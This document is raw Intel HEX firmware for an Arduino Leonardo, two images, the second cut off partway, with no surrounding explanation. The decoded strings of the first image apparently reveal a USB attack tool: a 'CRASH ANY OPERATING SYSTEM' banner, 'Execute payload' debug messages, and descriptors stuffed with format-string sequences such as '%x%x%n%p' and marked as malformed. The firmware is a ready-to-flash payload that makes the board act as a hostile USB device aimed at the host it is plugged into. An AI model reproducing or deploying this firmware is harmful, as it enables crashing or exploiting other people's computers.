console + +Arduino Leonardo Firmware #1: + +:100000000C94A8000C94C5000C94C5000C94C50079 +:100010000C94C5000C94C5000C94C5000C94C5004C +:100020000C94C5000C94C5000C94C2050C942D04CE +:100030000C94C5000C94C5000C94C5000C94C5002C +:100040000C94C5000C94C5000C94C5000C94C5001C +:100050000C94C5000C94C5000C94C5000C940C02C3 +:100060000C94C5000C94C5000C94C5000C94C500FC +:100070000C94C5000C94C5000C94C5000C94C500EC +:100080000C94C5000C94C5000C94C5000C94C500DC +:100090000C94C5000C94C5000C94C5000C94C500CC +:1000A0000C94C5000C94C5000C94C50009030C0306 +:1000B000FF0203032D032D032D0310031403180364 +:1000C0001E0322032D0328030000000200080E0077 +:1000D00000030401000B000000000000000000000D +:1000E00000000000000004080201104080401020C1 +:1000F00040804080080204018040201002011080EE +:100100001020404004040404040304050202020217 +:1001100004030202020206060606060604040202A0 +:100120000204000000002300260029002C002F00FC +:1001300000000000250028002B002E0031000000E8 +:100140000000240027002A002D00300000C180811B +:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077 +:10016000B1E0E0EDF3E102C005900D92A436B107D5 +:10017000D9F725E0A4E6B5E001C01D92AF37B2077C +:10018000E1F70E94C8000C9402070C940000089547 +:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421 +:1001A000DEBF0FBECDBF0E949F020E94C70060E06D +:1001B00083E00E942E0361E087E00E942E0361E04D +:1001C00088E00E942E030E9457067E012AE9E20E73 +:1001D000F11C84E093E0D70111969C938E9389E003 +:1001E00094E013969C938E93129782E2E2E1F1E001 +:1001F0009E012F5F3F4F6901D90101900D928A95B1 +:10020000E1F788E1E4E3F1E0DE01939601900D92DD +:100210008A95E1F782E1ECE4F1E0DE01DB96019002 +:100220000D928A95E1F789E0EEE5F1E0DE01A05953 +:10023000BF4F01900D928A95E1F72A593F4F99E0FF +:10024000992ED901E92D1D92EA95E9F78E010957FA +:100250001F4F87E0E7E6F1E0D80101900D928A9503 +:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189 +:1002700001900D928A95E1F7AE0147585F4F87E0F4 +:10028000E5E7F1E0DA0101900D928A95E1F75E0170 +:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D +:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172 +:1002B0001D92EA95E9F7E3E0DC011996EC93F90168 +:1002C0009082E4E0D9011196EC93F901DC01292D2B +:1002D00001900D922A95E1F7FE01EC56FF4FDC01EB +:1002E0001B96FC93EE931A971D96BC92AE921C97A8 +:1002F0001183008373836283558344830C521109F5 +:100300002CE0F80111922A95E9F721E0D80119961D +:100310002C931997FE01E059FF4F01900D929A948A +:10032000E1F7F8019387828761E088E00E94670324 +:100330008BE492E00E94630688E892E00E946306E4 +:1003400087EC92E00E94630686E093E00E946306D9 +:1003500082E493E00E9463068FE793E00E946306C5 +:1003600084EA93E00E9463068BEE93E00E946306AA +:1003700083E00E949D03892B09F047C05E01F3E2F0 +:10038000AF0EB11C8824839482E1982E84E194E01E +:100390000E946306BF92AF92DF92CF92FF92EF92DC +:1003A0001F928F921F930F932DB73EB722513109A1 +:1003B0000FB6F8943EBF0FBE2DBFADB7BEB71196B6 +:1003C000FE01FB96892D01900D928A95E1F78DE64D +:1003D00095E00E94010668E873E180E090E00E94E9 +:1003E00079028DE695E00E944C0660E087E00E946D +:1003F000670368E873E180E090E00E9479020FB63D +:10040000F894DEBF0FBECDBFC1CF6AE070E080E0E0 +:1004100090E00E947902ACCF1F920F920FB60F921C +:1004200011242F933F938F939F93AF93BF9380910A +:10043000650590916605A0916705B09168053091BA +:10044000640523E0230F2D3720F40196A11DB11D73 +:1004500005C026E8230F0296A11DB11D2093640557 +:100460008093650590936605A0936705B093680532 +:100470008091690590916A05A0916B05B0916C051A +:100480000196A11DB11D8093690590936A05A09303 +:100490006B05B0936C05BF91AF919F918F913F9188 +:1004A0002F910F900FBE0F901F9018953FB7F894A3 +:1004B0008091690590916A05A0916B05B0916C05DA +:1004C00026B5A89B05C02F3F19F00196A11DB11DAF +:1004D0003FBF6627782F892F9A2F620F711D811DCC +:1004E000911D42E0660F771F881F991F4A95D1F72B +:1004F0000895CF92DF92EF92FF92CF93DF936B013B +:100500007C010E945602EB01C114D104E104F10404 +:1005100079F00E9456026C1B7D0B683E7340A0F37D +:1005200081E0C81AD108E108F108C851DC4FECCFCE +:10053000DF91CF91FF90EF90DF90CF900895789466 +:1005400084B5826084BD84B5816084BD85B58260D8 +:1005500085BD85B5816085BDEEE6F0E08081816076 +:100560008083E1E8F0E01082808182608083808176 +:1005700081608083E0E8F0E0808181608083E1E950 +:10058000F0E0808182608083808181608083E0E907 +:10059000F0E0808181608083E1ECF0E08081846024 +:1005A0008083808182608083808181608083E3ECAE +:1005B000F0E0808181608083E0ECF0E08081826007 +:1005C0008083E2ECF0E0808181608083EAE7F0E004 +:1005D000808184608083808182608083808181606B +:1005E0008083808180688083089590E0FC0131974A +:1005F000EE30F10590F5EA5AFF4F0C94A90980916D +:1006000080008F7703C0809180008F7D8093800071 +:10061000089584B58F7702C084B58F7D84BD089519 +:10062000809190008F7707C0809190008F7D03C0EC +:1006300080919000877F8093900008958091C00002 +:100640008F7703C08091C0008F7D8093C000089594 +:100650008091C200877F8093C2000895CF93DF937B +:1006600090E0FC01EA51FF4F2491FC01EC5FFE4F4A +:100670008491882349F190E0880F991FFC01E25C86 +:10068000FE4FA591B491805D9E4FFC01C591D49120 +:100690009FB7611108C0F8948C91209582238C93A8 +:1006A000888182230AC0623051F4F8948C91322FF1 +:1006B000309583238C938881822B888304C0F8949F +:1006C0008C91822B8C939FBFDF91CF9108950F93D4 +:1006D0001F93CF93DF931F92CDB7DEB7282F30E063 +:1006E000F901E853FF4F8491F901EA51FF4F14914A +:1006F000F901EC5FFE4F04910023C9F0882321F03B +:1007000069830E94F5026981E02FF0E0EE0FFF1F80 +:10071000E05DFE4FA591B4919FB7F8948C91611163 +:1007200003C01095812301C0812B8C939FBF0F9034 +:10073000DF91CF911F910F910895CF93DF93282FD1 +:1007400030E0F901E853FF4F8491F901EA51FF4F7E +:10075000D491F901EC5FFE4FC491CC2391F081114B +:100760000E94F502EC2FF0E0EE0FFF1FEE5DFE4F52 +:10077000A591B4912C912D2381E090E021F480E0AB +:1007800002C080E090E0DF91CF910895615030F099 +:100790002091F100FC0120830196F8CF289884E68F +:1007A00080937D0508951092E900109271051092D2 +:1007B000700590936F0580936E050895FF920F93D7 +:1007C0001F93CF93DF93F82E8B01EA01BA01C80182 +:1007D0000E94A406F80120E030E08EEF2C173D07C0 +:1007E00091F1F7FE02C0A49101C0A0816091700553 +:1007F0007091710540916E0550916F0564177507F2 +:10080000ACF49091E8009570E1F39091E80092FDCE +:100810001CC0A093F100A0917005B09171051196D4 +:10082000AF73BB27AB2B11F48093E800A091700548 +:10083000B09171051196B0937105A09370052F5F6B +:100840003F4F3196CBCFC90102C08FEF9FEFDF91B1 +:10085000CF911F910F91FF9008951F920F920FB6A5 +:100860000F9211246F927F928F929F92AF92BF92BC +:10087000CF92DF92EF92FF920F931F932F933F93AC +:100880004F935F936F937F938F939F93AF93BF9398 +:10089000EF93FF93CF93DF93CDB7DEB76297DEBFC1 +:1008A000CDBF1092E9008091E80083FF46C168E067 +:1008B000CE010A960E94C60382EF8093E8009A85D3 +:1008C00097FF05C08091E80080FFFCCF03C08EEF4A +:1008D0008093E800892F807609F023C18B858111F0 +:1008E00005C01092F1001092F10020C1282F2D7F39 +:1008F000213009F41BC1853049F48091E80080FF64 +:10090000FCCF8C8580688093E30010C1863009F0AD +:10091000E1C02D8508891989223009F0B3C0EC8423 +:100920008E2D90E020917305309174058217930706 +:100930000CF09FC00E94D3031F92EF928DE394E0CE +:100940009F938F930E9481068CE0E89E7001112492 +:10095000E0917505F0917605EE0DFF1D89E0DE0151 +:10096000119601900D928A95E1F7C8010E94D30378 +:1009700049E050E0BE016F5F7F4F80E00E94DE03E0 +:100980000F900F900F900F90C12CD12C612C712CD7 +:1009900033E7A32E34E0B32E4AEA842E44E0942EAB +:1009A000E0917505F0917605EE0DFF1D818590E0D3 +:1009B000681679060CF0BAC07F926F92BF92AF9220 +:1009C0000E948106E0917505F0917605EE0DFF1D00 +:1009D000628573856C0D7D1D49E050E080E00E94CA +:1009E000DE030F900F900F900F9000E010E0E09169 +:1009F0007505F0917605EE0DFF1D0284F385E02D5F +:100A0000EC0DFD1D818590E0081719075CF51F931B +:100A10000F939F928F920E948106E0917505F0914D +:100A20007605EE0DFF1D0284F385E02DEC0DFD1D16 +:100A3000C801880F991FA485B585A80FB91F4D91CE +:100A40005C910284F385E02DE80FF91F60817181CC +:100A500080E00E94DE030F5F1F4F0F900F900F90FA +:100A60000F90C5CF8FEF681A780A8EE0C80ED11CA0 +:100A700097CF8FED94E09F938F930E9481060F9004 +:100A80000F9058C0C8012A8B0E94D3032A892130B5 +:100A9000C1F0233009F04EC08C851F928F9389EFEF +:100AA00094E09F938F930E94810642E050E062E8B9 +:100AB00071E080E00E94DE030F900F900F900F9086 +:100AC00035C04091000150E060E071E080E00E949C +:100AD000DE032CC0873071F1883021F481E08093EF +:100AE000F10024C0893011F5937021F5EDE4F1E0B7 +:100AF00081E021E096E38093E9002093EB003491BC +:100B00003093EC009093ED008F5F3196843099F72D +:100B10008EE78093EA001092EA008C85809372053C +:100B200005C0888999890E94D30304C08EEF809301 +:100B3000E80003C081E28093EB0062960FB6F89460 +:100B4000DEBF0FBECDBFDF91CF91FF91EF91BF917F +:100B5000AF919F918F917F916F915F914F913F9155 +:100B60002F911F910F91FF90EF90DF90CF90BF904A +:100B7000AF909F908F907F906F900F900FBE0F90CF +:100B80001F9018951F920F920FB60F9211248F93FA +:100B90009F938091E1001092E10083FF0FC01092BB +:100BA000E90091E09093EB001092EC0092E39093B7 +:100BB000ED001092720598E09093F00082FF1AC049 +:100BC00080917E05882339F080917E058150809345 +:100BD0007E05882369F080917D05882359F08091F6 +:100BE0007D05815080937D05811104C0289A02C043 +:100BF0005D9AF1CF9F918F910F900FBE0F901F9034 +:100C00001895CF93DF93CDB7DEB782E1FE0135961D +:100C1000A0E0B1E001900D928A95E1F78F89988D5F +:100C20009093760580937505898D9A8D90937405C0 +:100C3000809373058B8D9C8D90937C0580937B05B1 +:100C40008D8D9E8D90937A05809379058F8D98A1D7 +:100C500090937805809377051092720581E08093D8 +:100C6000D70080EA8093D80082E189BD09B400FEF4 +:100C7000FDCF61E070E080E090E00E94790280E9C1 +:100C80008093D8008CE08093E2001092E000559AA7 +:100C9000209ADF91CF91089581E08093E00008953C +:100CA0009091C80095FFFCCF8093CE0008951092DC +:100CB000CD0087E68093CC0088E18093C9008EE068 +:100CC0008093CA0008950F931F93CF93DF93EC0195 +:100CD0008C01FE0101900020E9F73197EC1BFD0B20 +:100CE000C8018C1B9D0B8E179F0730F4F801819172 +:100CF0008F010E945006EDCFDF91CF911F910F9190 +:100D00000895CF93DF93CDB7DEB7DA950FB6F89499 +:100D1000DEBF0FBECDBFFE01EB5FFE4F4191519193 +:100D20009F0160E071E0CE0101960E940507CE01AF +:100D300001960E946306D3950FB6F894DEBF0FBEEE +:100D4000CDBFDF91CF9108958F929F92AF92BF92C6 +:100D5000CF92DF92EF92FF920F931F93CF93DF9387 +:100D600000D0CDB7DEB75B0122E535E03F932F938E +:100D700089839A830E9481068981882E9A81992E7F +:100D80000F900F9000E010E08EE5E82E85E0F82E41 +:100D900091E1C92E94E0D92E0A151B05E4F4F40163 +:100DA00081914F0190E09F938F93FF92EF920E9469 +:100DB00081060F5F1F4FC8018F7099270F900F900A +:100DC0000F900F90892B41F7DF92CF920E948106FE +:100DD0000F900F90E1CF81E194E09F938F930E9459 +:100DE00081060F900F900F900F90DF91CF911F9180 +:100DF0000F91FF90EF90DF90CF90BF90AF909F90BA +:100E00008F900895F8940C94E609AEE0B0E0EBE022 +:100E1000F7E00C94BD098C01CA0146E04C831A83AB +:100E2000098377FF02C060E070E8615071097E833A +:100E30006D83A901BC01CE0101960E9431074D814D +:100E40005E8157FD0AC02F813885421753070CF485 +:100E50009A01F801E20FF31F10822E96E4E00C9441 +:100E6000D909ACE0B0E0E7E3F7E00C94AF097C010E +:100E70006B018A01FC0117821682838181FFBDC14B +:100E8000CE0101964C01F7019381F60193FD859106 +:100E900093FF81916F01882309F4ABC1853239F446 +:100EA00093FD859193FF81916F01853229F4B701FC +:100EB00090E00E941909E7CF512C312C20E020321C +:100EC000A0F48B3269F030F4803259F0833269F447 +:100ED00020612CC08D3239F0803339F4216026C076 +:100EE0002260246023C0286021C027FD27C030ED88 +:100EF000380F3A3078F426FF06C0FAE05F9E300DD6 +:100F00001124532E13C08AE0389E300D1124332E45 +:100F100020620CC08E3221F426FD6BC1206406C015 +:100F20008C3611F4206802C0883641F4F60193FD36 +:100F3000859193FF81916F018111C1CF982F9F7D82 +:100F40009554933028F40C5F1F4FFFE3F9830DC0D5 +:100F5000833631F0833771F0833509F05BC022C0EE +:100F6000F801808189830E5F1F4F44244394512CE4 +:100F7000540115C03801F2E06F0E711CF801A08019 +:100F8000B18026FF03C0652D70E002C06FEF7FEFD8 +:100F9000C5012C870E940E092C0183012C852F7717 +:100FA000222E17C03801F2E06F0E711CF801A080EC +:100FB000B18026FF03C0652D70E002C06FEF7FEFA8 +:100FC000C5012C870E9403092C012C852068222E44 +:100FD000830123FC1BC0832D90E048165906B0F412 +:100FE000B70180E290E00E9419093A94F4CFF5012C +:100FF00027FC859127FE81915F01B70190E00E9457 +:10100000190931103A94F1E04F1A51084114510472 +:1010100071F7E5C0843611F0893639F5F80127FFFC +:1010200007C060817181828193810C5F1F4F08C06E +:1010300060817181882777FD8095982F0E5F1F4F03 +:101040002F76B22E97FF09C0909580957095619587 +:101050007F4F8F4F9F4F2068B22E2AE030E0A401CF +:101060000E944B09A82EA81844C0853729F42F7E6A +:10107000B22E2AE030E025C0F22FF97FBF2E8F3646 +:10108000C1F018F4883579F0B4C0803719F088378A +:1010900021F0AFC02F2F2061B22EB4FE0DC08B2DDA +:1010A0008460B82E09C024FF0AC09F2F9660B92E15 +:1010B00006C028E030E005C020E130E002C020E1B9 +:1010C00032E0F801B7FE07C06081718182819381AF +:1010D0000C5F1F4F06C06081718180E090E00E5F61 +:1010E0001F4FA4010E944B09A82EA818FB2DFF77C3 +:1010F000BF2EB6FE0BC02B2D2E7FA51450F4B4FED0 +:101100000AC0B2FC08C02B2D2E7E05C07A2C2B2DD8 +:1011100003C07A2C01C0752C24FF0DC0FE01EA0D1E +:10112000F11D8081803311F4297E09C022FF06C0A1 +:101130007394739404C0822F867809F0739423FD0E +:1011400013C020FF06C05A2C731418F4530C571800 +:10115000732C731468F4B70180E290E02C870E942E +:10116000190973942C85F5CF731410F4371801C046 +:10117000312C24FF12C0B70180E390E02C870E943D +:1011800019092C8522FF17C021FF03C088E590E0D4 +:1011900002C088E790E0B7010CC0822F867859F032 +:1011A00021FD02C080E201C08BE227FD8DE2B70184 +:1011B00090E00E941909A51438F4B70180E390E08B +:1011C0000E9419095A94F7CFAA94F401EA0DF11D6F +:1011D0008081B70190E00E941909A110F5CF33205A +:1011E00009F451CEB70180E290E00E9419093A94C7 +:1011F000F6CFF7018681978102C08FEF9FEF2C9683 +:10120000E2E10C94CB09FC010590615070400110A3 +:10121000D8F7809590958E0F9F1F0895FC0161501F +:10122000704001900110D8F7809590958E0F9F1F08 +:1012300008950F931F93CF93DF93182F092FEB017E +:101240008B8181FD03C08FEF9FEF20C082FF10C014 +:101250004E815F812C813D81421753077CF4E881E8 +:10126000F9819F012F5F3F4F39832883108306C088 +:10127000E885F985812F0995892B29F72E813F81F2 +:101280002F5F3F4F3F832E83812F902FDF91CF9190 +:101290001F910F910895FA01AA27283051F12031AA +:1012A00081F1E8946F936E7F6E5F7F4F8F4F9F4FFA +:1012B000AF4FB1E03ED0B4E03CD0670F781F891F3C +:1012C0009A1FA11D680F791F8A1F911DA11D6A0F0A +:1012D000711D811D911DA11D20D009F468943F91BD +:1012E0002AE0269F11243019305D3193DEF6CF01BC +:1012F0000895462F4770405D4193B3E00FD0C9F782 +:10130000F6CF462F4F70405D4A3318F0495D31FDEE +:101310004052419302D0A9F7EACFB4E0A695979541 +:10132000879577956795BA95C9F700976105710517 +:1013300008959B01AC010A2E069457954795379561 +:101340002795BA95C9F7620F731F841F951FA01DBB +:101350000895EE0FFF1F0590F491E02D09942F9250 +:101360003F924F925F926F927F928F929F92AF9235 +:10137000BF92CF92DF92EF92FF920F931F93CF9382 +:10138000DF93CDB7DEB7CA1BDB0B0FB6F894DEBF19 +:101390000FBECDBF09942A88398848885F846E843F +:1013A0007D848C849B84AA84B984C884DF80EE8089 +:1013B000FD800C811B81AA81B981CE0FD11D0FB692 +:1013C000F894DEBF0FBECDBFED010895F894FFCFB6 +:1013D0001201000200000040AD0BEFBE000101024F +:1013E000000122034200610064002000420041002D +:1013F00042004500250078002500780025006E0099 +:101400002500700018034200410044002000430002 +:101410003000460046004500450021001201000250 +:10142000000000406A0503000001010203010902F7 +:10143000270001010000FA0705810304040C0705D9 +:10144000010204000C0705820104000C07000700DC +:101450000700480100500072006F006C00690066D0 +:101460000069006300000A550000006BFD180A00C7 +:10147000809F0AB901312B940A8101128946001319 +:10148000000257028B0A5E0AF80A5F01F21201009D +:1014900002010000400D055702000101020301B9DD +:1014A0000A0100F80A5F0A810A220342006100640F +:1014B0000020004200410042004500250078002540 +:1014C00000780025006E00250070001803420041DE +:1014D000004400200043003000460046004500451F +:1014E00000210012010002010000400D055702001A +:1014F000010102030109040000030100000003F2DE +:101500000AEC0A0902270001010000FA01AB0A09EE +:101510000400000301000000090200202020202018 +:101520005F5F5F5F5F5F5F5F2020202020202020C3 +:1015300020202020202020202020202020202020AB +:1015400020205F5F5F5F5F205F5F20205F202020A3 +:101550002020205F5F0A0D00202020202F205F5FC9 +:101560005F5F2F202F5F20205F5F5F5F205F5F5FE7 +:101570005F5F20205F5F5F5F5F20202020202F20A3 +:101580005F5F5F2F2F202F5F285F295F5F5F5F2FD7 +:10159000202F5F5F0A0D002020202F202F202020E9 +:1015A0002F205F5F205C2F205F5F20602F205F5F18 +:1015B000205C2F205F5F5F2F5F5F5F5F205C5F5F5E +:1015C000205C2F205F5F2F202F205F5F5F2F202F59 +:1015D0002F5F2F0A0D0020202F202F5F5F5F2F200D +:1015E0002F202F202F202F5F2F202F202F5F2F2005 +:1015F000285F5F2020292F5F5F5F2F205F5F2F20F4 +:101600002F202F5F2F202F202F5F5F2F202C3C0AB1 +:101610000D0020205C5F5F5F5F2F5F2F202F5F2F0B +:101620005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F63 +:101630002F20202020202F5F5F5F5F2F5C5F5F2FB8 +:101640005F2F5C5F5F5F2F5F2F7C5F7C0A0D002048 +:101650003C3C2043485241534820414E59204F5072 +:1016600045524154494E472053595354454D203E0D +:101670003E0A0D00203C3C202863292053657267F8 +:10168000656A20536368756D696C6F20323031353F +:101690002C204F70656E536F7572636520536563C0 +:1016A00075726974792052616C66205370656E6E34 +:1016B0006562657267203E3E0A0D000A3E3E20507C +:1016C0007265737320627574746F6E20746F20730B +:1016D0007461727420657865637574696F6E2E2EFF +:1016E0002E0A0D005B44454255475D2045786563F1 +:1016F000757465207061796C6F616420300A0D002B +:10170000526563762D446174613A0A0D005B44456D +:101710004255475D200953656E6420436F6E6669CC +:101720006775726174696F6E446573637269707412 +:101730006F720928696E6465783A2569292E2E2E04 +:101740000D0A005B44454255475D200953656E64B0 +:1017500020496E74657266616365204465736372C7 +:101760006970746F720928696E7465726661636569 +:101770003A2569292E2E2E0D0A005B444542554715 +:101780005D200953656E6420456E64706F696E74E8 +:101790002044657363726970746F720928656E64A2 +:1017A000706F696E743A2569292E2E2E0D0A005B22 +:1017B00044454255475D203C3C70616E6963206D35 +:1017C0006F64653F3E3E0D0A005B44454255475DF0 +:1017D0002009203E3E20537472696E672044657371 +:1017E00063726970746F72207265717565737420AD +:1017F0002D2073656E64696E67206D616C666F7213 +:101800006D656420737472696E67212073657475E9 +:10181000702E7756616C75654C203D3D2025690D15 +:101820000A005B48455844554D505D0A0D0025306F +:04183000325820000A +:00000001FF + +Arduino Leonardo Firmware #2: + +:100000000C94A8000C94C5000C94C5000C94C50079 +:100010000C94C5000C94C5000C94C5000C94C5004C +:100020000C94C5000C94C5000C94C2050C942D04CE +:100030000C94C5000C94C5000C94C5000C94C5002C +:100040000C94C5000C94C5000C94C5000C94C5001C +:100050000C94C5000C94C5000C94C5000C940C02C3 +:100060000C94C5000C94C5000C94C5000C94C500FC +:100070000C94C5000C94C5000C94C5000C94C500EC +:100080000C94C5000C94C5000C94C5000C94C500DC +:100090000C94C5000C94C5000C94C5000C94C500CC +:1000A0000C94C5000C94C5000C94C50009030C0306 +:1000B000FF0203032D032D032D0310031403180364 +:1000C0001E0322032D0328030000000200080E0077 +:1000D00000030401000B000000000000000000000D +:1000E00000000000000004080201104080401020C1 +:1000F00040804080080204018040201002011080EE +:100100001020404004040404040304050202020217 +:1001100004030202020206060606060604040202A0 +:100120000204000000002300260029002C002F00FC +:1001300000000000250028002B002E0031000000E8 +:100140000000240027002A002D00300000C180811B +:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077 +:10016000B1E0E0EDF3E102C005900D92A436B107D5 +:10017000D9F725E0A4E6B5E001C01D92AF37B2077C +:10018000E1F70E94C8000C9402070C940000089547 +:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421 +:1001A000DEBF0FBECDBF0E949F020E94C70060E06D +:1001B00083E00E942E0361E087E00E942E0361E04D +:1001C00088E00E942E030E9457067E012AE9E20E73 +:1001D000F11C84E093E0D70111969C938E9389E003 +:1001E00094E013969C938E93129782E2E2E1F1E001 +:1001F0009E012F5F3F4F6901D90101900D928A95B1 +:10020000E1F788E1E4E3F1E0DE01939601900D92DD +:100210008A95E1F782E1ECE4F1E0DE01DB96019002 +:100220000D928A95E1F789E0EEE5F1E0DE01A05953 +:10023000BF4F01900D928A95E1F72A593F4F99E0FF +:10024000992ED901E92D1D92EA95E9F78E010957FA +:100250001F4F87E0E7E6F1E0D80101900D928A9503 +:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189 +:1002700001900D928A95E1F7AE0147585F4F87E0F4 +:10028000E5E7F1E0DA0101900D928A95E1F75E0170 +:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D +:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172 +:1002B0001D92EA95E9F7E3E0DC011996EC93F90168 +:1002C0009082E4E0D9011196EC93F901DC01292D2B +:1002D00001900D922A95E1F7FE01EC56FF4FDC01EB +:1002E0001B96FC93EE931A971D96BC92AE921C97A8 +:1002F0001183008373836283558344830C521109F5 +:100300002CE0F80111922A95E9F721E0D80119961D +:100310002C931997FE01E059FF4F01900D929A948A +:10032000E1F7F8019387828761E088E00E94670324 +:100330008BE492E00E94630688E892E00E946306E4 +:1003400087EC92E00E94630686E093E00E946306D9 +:1003500082E493E00E9463068FE793E00E946306C5 +:1003600084EA93E00E9463068BEE93E00E946306AA +:1003700083E00E949D03892B09F047C05E01F3E2F0 +:10038000AF0EB11C8824839482E1982E84E194E01E +:100390000E946306BF92AF92DF92CF92FF92EF92DC +:1003A0001F928F921F930F932DB73EB722513109A1 +:1003B0000FB6F8943EBF0FBE2DBFADB7BEB71196B6 +:1003C000FE01FB96892D01900D928A95E1F78DE64D +:1003D00095E00E94010668E873E180E090E00E94E9 +:1003E00079028DE695E00E944C0660E087E00E946D +:1003F000670368E873E180E090E00E9479020FB63D +:10040000F894DEBF0FBECDBFC1CF6AE070E080E0E0 +:1004100090E00E947902ACCF1F920F920FB60F921C +:1004200011242F933F938F939F93AF93BF9380910A +:10043000650590916605A0916705B09168053091BA +:10044000640523E0230F2D3720F40196A11DB11D73 +:1004500005C026E8230F0296A11DB11D2093640557 +:100460008093650590936605A0936705B093680532 +:100470008091690590916A05A0916B05B0916C051A +:100480000196A11DB11D8093690590936A05A09303 +:100490006B05B0936C05BF91AF919F918F913F9188 +:1004A0002F910F900FBE0F901F9018953FB7F894A3 +:1004B0008091690590916A05A0916B05B0916C05DA +:1004C00026B5A89B05C02F3F19F00196A11DB11DAF +:1004D0003FBF6627782F892F9A2F620F711D811DCC +:1004E000911D42E0660F771F881F991F4A95D1F72B +:1004F0000895CF92DF92EF92FF92CF93DF936B013B +:100500007C010E945602EB01C114D104E104F10404 +:1005100079F00E9456026C1B7D0B683E7340A0F37D +:1005200081E0C81AD108E108F108C851DC4FECCFCE +:10053000DF91CF91FF90EF90DF90CF900895789466 +:1005400084B5826084BD84B5816084BD85B58260D8 +:1005500085BD85B5816085BDEEE6F0E08081816076 +:100560008083E1E8F0E01082808182608083808176 +:1005700081608083E0E8F0E0808181608083E1E950 +:10058000F0E0808182608083808181608083E0E907 +:10059000F0E0808181608083E1ECF0E08081846024 +:1005A0008083808182608083808181608083E3ECAE +:1005B000F0E0808181608083E0ECF0E08081826007 +:1005C0008083E2ECF0E0808181608083EAE7F0E004 +:1005D000808184608083808182608083808181606B +:1005E0008083808180688083089590E0FC0131974A +:1005F000EE30F10590F5EA5AFF4F0C94A90980916D +:1006000080008F7703C0809180008F7D8093800071 +:10061000089584B58F7702C084B58F7D84BD089519 +:10062000809190008F7707C0809190008F7D03C0EC +:1006300080919000877F8093900008958091C00002 +:100640008F7703C08091C0008F7D8093C000089594 +:100650008091C200877F8093C2000895CF93DF937B +:1006600090E0FC01EA51FF4F2491FC01EC5FFE4F4A +:100670008491882349F190E0880F991FFC01E25C86 +:10068000FE4FA591B491805D9E4FFC01C591D49120 +:100690009FB7611108C0F8948C91209582238C93A8 +:1006A000888182230AC0623051F4F8948C91322FF1 +:1006B000309583238C938881822B888304C0F8949F +:1006C0008C91822B8C939FBFDF91CF9108950F93D4 +:1006D0001F93CF93DF931F92CDB7DEB7282F30E063 +:1006E000F901E853FF4F8491F901EA51FF4F14914A +:1006F000F901EC5FFE4F04910023C9F0882321F03B +:1007000069830E94F5026981E02FF0E0EE0FFF1F80 +:10071000E05DFE4FA591B4919FB7F8948C91611163 +:1007200003C01095812301C0812B8C939FBF0F9034 +:10073000DF91CF911F910F910895CF93DF93282FD1 +:1007400030E0F901E853FF4F8491F901EA51FF4F7E +:10075000D491F901EC5FFE4FC491CC2391F081114B +:100760000E94F502EC2FF0E0EE0FFF1FEE5DFE4F52 +:10077000A591B4912C912D2381E090E021F480E0AB +:1007800002C080E090E0DF91CF910895615030F099 +:100790002091F100FC0120830196F8CF289884E68F +:1007A00080937D0508951092E900109271051092D2 +:1007B000700590936F0580936E050895FF920F93D7 +:1007C0001F93CF93DF93F82E8B01EA01BA01C80182 +:1007D0000E94A406F80120E030E08EEF2C173D07C0 +:1007E00091F1F7FE02C0A49101C0A0816091700553 +:1007F0007091710540916E0550916F0564177507F2 +:10080000ACF49091E8009570E1F39091E80092FDCE +:100810001CC0A093F100A0917005B09171051196D4 +:10082000AF73BB27AB2B11F48093E800A091700548 +:10083000B09171051196B0937105A09370052F5F6B +:100840003F4F3196CBCFC90102C08FEF9FEFDF91B1 +:10085000CF911F910F91FF9008951F920F920FB6A5 +:100860000F9211246F927F928F929F92AF92BF92BC +:10087000CF92DF92EF92FF920F931F932F933F93AC +:100880004F935F936F937F938F939F93AF93BF9398 +:10089000EF93FF93CF93DF93CDB7DEB76297DEBFC1 +:1008A000CDBF1092E9008091E80083FF46C168E067 +:1008B000CE010A960E94C60382EF8093E8009A85D3 +:1008C00097FF05C08091E80080FFFCCF03C08EEF4A +:1008D0008093E800892F807609F023C18B858111F0 +:1008E00005C01092F1001092F10020C1282F2D7F39 +:1008F000213009F41BC1853049F48091E80080FF64 +:10090000FCCF8C8580688093E30010C1863009F0AD +:10091000E1C02D8508891989223009F0B3C0EC8423 +:100920008E2D90E020917305309174058217930706 +:100930000CF09FC00E94D3031F92EF928DE394E0CE +:100940009F938F930E9481068CE0E89E7001112492 +:10095000E0917505F0917605EE0DFF1D89E0DE0151 +:10096000119601900D928A95E1F7C8010E94D30378 +:1009700049E050E0BE016F5F7F4F80E00E94DE03E0 +:100980000F900F900F900F90C12CD12C612C712CD7 +:1009900033E7A32E34E0B32E4AEA842E44E0942EAB +:1009A000E0917505F0917605EE0DFF1D818590E0D3 +:1009B000681679060CF0BAC07F926F92BF92AF9220 +:1009C0000E948106E0917505F0917605EE0DFF1D00 +:1009D000628573856C0D7D1D49E050E080E00E94CA +:1009E000DE030F900F900F900F9000E010E0E09169 +:1009F0007505F0917605EE0DFF1D0284F385E02D5F +:100A0000EC0DFD1D818590E0081719075CF51F931B +:100A10000F939F928F920E948106E0917505F0914D +:100A20007605EE0DFF1D0284F385E02DEC0DFD1D16 +:100A3000C801880F991FA485B585A80FB91F4D91CE +:100A40005C910284F385E02DE80FF91F60817181CC +:100A500080E00E94DE030F5F1F4F0F900F900F90FA +:100A60000F90C5CF8FEF681A780A8EE0C80ED11CA0 +:100A700097CF8FED94E09F938F930E9481060F9004 +:100A80000F9058C0C8012A8B0E94D3032A892130B5 +:100A9000C1F0233009F04EC08C851F928F9389EFEF +:100AA00094E09F938F930E94810642E050E062E8B9 +:100AB00071E080E00E94DE030F900F900F900F9086 +:100AC00035C04091000150E060E071E080E00E949C +:100AD000DE032CC0873071F1883021F481E08093EF +:100AE000F10024C0893011F5937021F5EDE4F1E0B7 +:100AF00081E021E096E38093E9002093EB003491BC +:100B00003093EC009093ED008F5F3196843099F72D +:100B10008EE78093EA001092EA008C85809372053C +:100B200005C0888999890E94D30304C08EEF809301 +:100B3000E80003C081E28093EB0062960FB6F89460 +:100B4000DEBF0FBECDBFDF91CF91FF91EF91BF917F 